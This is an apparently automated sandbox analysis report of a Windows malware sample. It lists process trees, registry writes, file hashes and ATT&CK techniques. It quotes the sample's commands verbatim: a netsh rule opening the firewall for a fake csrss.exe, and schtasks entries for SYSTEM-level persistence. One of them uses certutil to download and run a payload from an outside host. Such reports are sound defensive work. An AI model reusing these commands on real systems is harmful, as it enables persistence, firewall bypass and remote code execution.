f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e

Analysis

max time kernel
27s
max time network
158s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
Size

3.8MB
MD5

e424b0225f4a52439d751fde2bafde40
SHA1

7199d44b399f1de33be40a5f5ad615816c9c0846
SHA256

f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e
SHA512

0a4ab1f81f10eb7629e43097cb19f4b9a8ef00a452d4edd77cfd2bbb0d0c9581401d88432cf48494aeb35f8795df2034a56e59e1b9ae6dd889894a3e5eb49a2f

Score

8^/10

evasion

Malware Config

Signatures

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Modifies boot configuration data using bcdedit 1 IoCs

Processes:

bcdedit.exe

pid process

1140 bcdedit.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1620 schtasks.exe
704 schtasks.exe

pid	process
1140	bcdedit.exe

pid	process
1620	schtasks.exe
704	schtasks.exe

Modifies data under HKEY_USERS 17 IoCs

Processes:

netsh.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client"	netsh.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-101 = "Provides RD Gateway enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies."	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-102 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party"	netsh.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exef9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe

pid	process
1720	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
428	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe

description	pid	process
Token: SeDebugPrivilege	1720	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
Token: SeImpersonatePrivilege	1720	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe

Suspicious use of WriteProcessMemory 7 IoCs

Processes:

f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.execmd.exe

description	pid	process	target process
PID 428 wrote to memory of 1612	428	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe	cmd.exe
PID 428 wrote to memory of 1612	428	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe	cmd.exe
PID 428 wrote to memory of 1612	428	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe	cmd.exe
PID 428 wrote to memory of 1612	428	f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe	cmd.exe
PID 1612 wrote to memory of 776	1612	cmd.exe	netsh.exe
PID 1612 wrote to memory of 776	1612	cmd.exe	netsh.exe
PID 1612 wrote to memory of 776	1612	cmd.exe	netsh.exe

C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
"C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1720

C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe
"C:\Users\Admin\AppData\Local\Temp\f9fe45b11dc4b5666d5b0ac26c6aaaab530fbfd9421c420fb3cffeff899b209e.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:428

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
3⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
4⤵
- Modifies data under HKEY_USERS
PID:776

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
3⤵
PID:1940

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
4⤵
- Creates scheduled task(s)
PID:1620

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
4⤵
- Creates scheduled task(s)
PID:704

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
4⤵
PID:612

C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
4⤵
- Modifies boot configuration data using bcdedit
PID:1140

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220524045322.log C:\Windows\Logs\CBS\CbsPersist_20220524045322.cab
1⤵
PID:268

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1021KB

MD5
276cdc77b76cc54dabe28221371059e8

SHA1
60ef7c80af61f364d20093460e4498074d2b8206

SHA256
67543e6156207a069d088c593522dcb8e57ccf5f823052c524ba97aa2f0a98ee

SHA512
8d3a2f76358b227958f00b4c2de45235dc17e534badf63513bec5f145c45201c73ce59936ae19498266ce0eb72e521b5f1927d7de01b9e0f11a401b17a88bf89

Download Submit
C:\Windows\rss\csrss.exe
Filesize
1.1MB

MD5
fdf58d032fef463c7354046ccb60d2c5

SHA1
3205f5b482590fe94f6f8e71fb5337f865f7a5f1

SHA256
6dac944f7a58fc23568528a66a8ef70fe90ddeb5e117b8f8ccaad87ae7b8e3f2

SHA512
d097dcda7134511bf962ee274cdc0ebcc1f1431dd4d1ed032e879f7094b10f07c1b1393c7cd4d194cded5ef1d0a31be570e029ecf300a24939b88110e598eaf2

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
1.0MB

MD5
dc18c26e31bcd1e198896d6adcb911e1

SHA1
cbc59029137fbd1bbd7dc09277d6fa8aaf22febc

SHA256
5e687f9d93f20a7a47938f7ab08d1427f47c412fdc65bfeac3b1458962c98bf9

SHA512
572035bec6488c9231cf18664a8db3546b2a666d492232398c2b31e4a49bdd9dc6f0d188734357bc218d355691fd55925599825a467c27c55c431349f70f25cf

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
648KB

MD5
f9be669affcaa92e22c9a0c561cf801a

SHA1
d2f9833017e91843253ecd37b7a45ce88cee8795

SHA256
21d1efd786411d18826e8d5246e72444b6ba9dcf04459c4a45591f1856ba3a7e

SHA512
7ffb2482538aa6d9d4c0ff50ca490c202166602ab0c31d8e6953bba573f029e7c73140fce2f83e65b0be798a481fc1fa9238609ce6a9fbd0688dc167bc8b6142

Download Submit
\Users\Admin\AppData\Local\Temp\csrss\patch.exe
Filesize
733KB

MD5
2fbf020fbc32ce3cd93f6d7bdcb5a29f

SHA1
229486255a583406b5ae1691fa5e833dde45d00a

SHA256
48354876312c30e393a8867803fc44ac1b41519655211fe4ca02dcf7fb8f615e

SHA512
a67e63ae2bfcffbb6e1b087936420a8b8e44c5cf3bd3a94c7f61ce0dc7dcb0b7302cad081131ff07f37b5a097bac1e8b75f14655a94748c7b9248de97db41ea7

Download Submit
\Users\Admin\AppData\Local\Temp\dbghelp.dll
Filesize
1018KB

MD5
6109aa601a138c0c9c4b95cba368a39b

SHA1
0790daaa1e6f64821990904700d5e44ccfe404d2

SHA256
e9e37d233e74840beff30a6210980349bfcc6ad664aa30d3e2fd45d664c63d9b

SHA512
3969fcdb0942fa21d9c35a2a3d3d32cb5b38563677ebefdf64522c8a1f6410b13eb70139c1a0fd2fdb77ec3c11f979dd23fc129d309364e3b16ee24ab6c11e2d

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.1MB

MD5
bae0ea83c6fdaa4eb7040c5432947cc8

SHA1
b4dd209750374e0ca1f242dd15feef600ad16de0

SHA256
19921bba5e87d6242a684af81e8d711af2e91a52c759f6c6900742fa6c970319

SHA512
cd408293fd53c2ae01a25047e57e673ded53329e92e4a7f9fd94c137d00b68f08e78be3c0c2776c6be46bb7a00c2dbb7f3b86085a23ca314fe87cdb0b1b1b1b3

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.0MB

MD5
1436b03d344a5c4a7b92970aeb4fa684

SHA1
c0309499ca487900bd6fb58762438c76fd0ff423

SHA256
d407a47a117a77026638a5970fda440ca25906727d1d7ad97c35fcac508ef7c5

SHA512
7082a267ed04ee1d05ec4f8cda501785549e5986c258627fc0d9494ef64bb3b0e06e19efa552945b1285cfef1e1774fae40ef5d52c514519308a658b19a78eb4

Download Submit
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
Filesize
1.0MB

MD5
a2627e145b0e8c09ce9dcf28b98fdae8

SHA1
147e75d5e1e31844ef04072ebdc3ef6911bf3fe2

SHA256
c34d2e99d76b6722ef8058238b3cb59307e5ba989fb81078cb6f59568a420528

SHA512
84d265b30bb3b4797b8fa087afcb3d581083e510b07ac2729075a4f90a434ac589ae9fef6108758b4acff54ab6d19699b38a776ba0008231b5fe0c087212b735

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
528KB

MD5
2ee1fc6fe22665bda8472c00919d7d5b

SHA1
bf04753227da94d8e17e65ef2aa43f49ef33ce49

SHA256
de7acac110ccda6fb63480c11c53ced38ff04dc0ddb99eb11bec41ef992ac9e6

SHA512
a8b686cce66ef915a5c2130003a16f73f5e07d7971d612974fa29bf0cc61a8b2c6054cfe34fba186f1b7b7150bac4388b388322ba9f401c5e78e52608ea77bf5

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
508KB

MD5
c28538794f51c845ab46e1cd7c3440e9

SHA1
93b0b555ba4c601c842759d9fb2c554aa60d967b

SHA256
3a429c75b58d5c28312d1a8a5bc7d3cee289fc48eb7c212a68f17750aaf5d184

SHA512
f153a13854e55d5ef81b876c6755dc1c0ef2a03de6ce6ec2ab4eb236bf963f960b33a3993b3f27d8b64192f0924e18f18c201f97b1a2272b3744f0edabc6951c

Download Submit
\Users\Admin\AppData\Local\Temp\osloader.exe
Filesize
454KB

MD5
616a78ad95bc201d7f631561882de1fb

SHA1
e5eb1134a56aa8eb67b1972e0285199548f8d93f

SHA256
0530b4398c89bc98480103b72f0a398724ee1b3b014bfdad836990edafddb6ed

SHA512
5bacac46ab41bdcade7ee2d07e827604bf53b083773df2b1c66e9bf478a96ad2f5b28e1a51c843ff145b9e59dcfffc29adb41660a1a5394f31f273d3d72278a8

Download Submit
\Users\Admin\AppData\Local\Temp\symsrv.dll
Filesize
163KB

MD5
5c399d34d8dc01741269ff1f1aca7554

SHA1
e0ceed500d3cef5558f3f55d33ba9c3a709e8f55

SHA256
e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f

SHA512
8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

Download Submit
\Windows\rss\csrss.exe
Filesize
987KB

MD5
fabcf4212b5323003245df6249164d7d

SHA1
c6fa7ecae15fcc473b80592e1d3e81d43701a8db

SHA256
da34626e17fa8eb50b9da678b4e43cc491638c5348890c96020f8971822f96e2

SHA512
1ce7f5697ab2224252af77e3d01a971b17b14b231d862128fa5fd3df51ad02c31439bbe32b279755f99761fd91f4215960fda0c381380ac58058437f6138f08d

Download Submit
\Windows\rss\csrss.exe
Filesize
1000KB

MD5
02c2b8493a35a8541cb49944e99262e8

SHA1
5a381437c6c213c8ad8585977a31cede12cefec0

SHA256
6619bef07e940ab2c8e903e6cf004df72a6a5405dff9886c545268705795aaf0

SHA512
00e84f385f8eab65c13249700b7b8f015dd44c7f849a6f1008fb803655554445f0ec17cd9c62a01d6bd7ca9921ce6f045d03aad77ac57ffbccef75700cae3c71

Download Submit
memory/428-67-0x0000000000400000-0x000000000313D000-memory.dmp

Filesize
45.2MB

Download
memory/428-66-0x00000000033C0000-0x0000000003766000-memory.dmp

Filesize
3.6MB

Download
memory/428-58-0x00000000033C0000-0x0000000003766000-memory.dmp

Filesize
3.6MB

Download
memory/776-61-0x000007FEFC041000-0x000007FEFC043000-memory.dmp

Filesize
8KB

Download
memory/776-60-0x0000000000000000-mapping.dmp

Download
memory/1140-84-0x0000000000000000-mapping.dmp

Download
memory/1612-59-0x0000000000000000-mapping.dmp

Download
memory/1720-54-0x00000000033D0000-0x0000000003776000-memory.dmp

Filesize
3.6MB

Download
memory/1720-57-0x0000000000400000-0x000000000313D000-memory.dmp

Filesize
45.2MB

Download
memory/1720-56-0x0000000003780000-0x0000000003E75000-memory.dmp

Filesize
7.0MB

Download
memory/1720-55-0x00000000033D0000-0x0000000003776000-memory.dmp

Filesize
3.6MB

Download
memory/1940-70-0x0000000000400000-0x000000000313D000-memory.dmp

Filesize
45.2MB

Download
memory/1940-69-0x0000000003140000-0x00000000034E6000-memory.dmp

Filesize
3.6MB

Download
memory/1940-68-0x0000000003140000-0x00000000034E6000-memory.dmp

Filesize
3.6MB

Download
memory/1940-64-0x0000000000000000-mapping.dmp

Download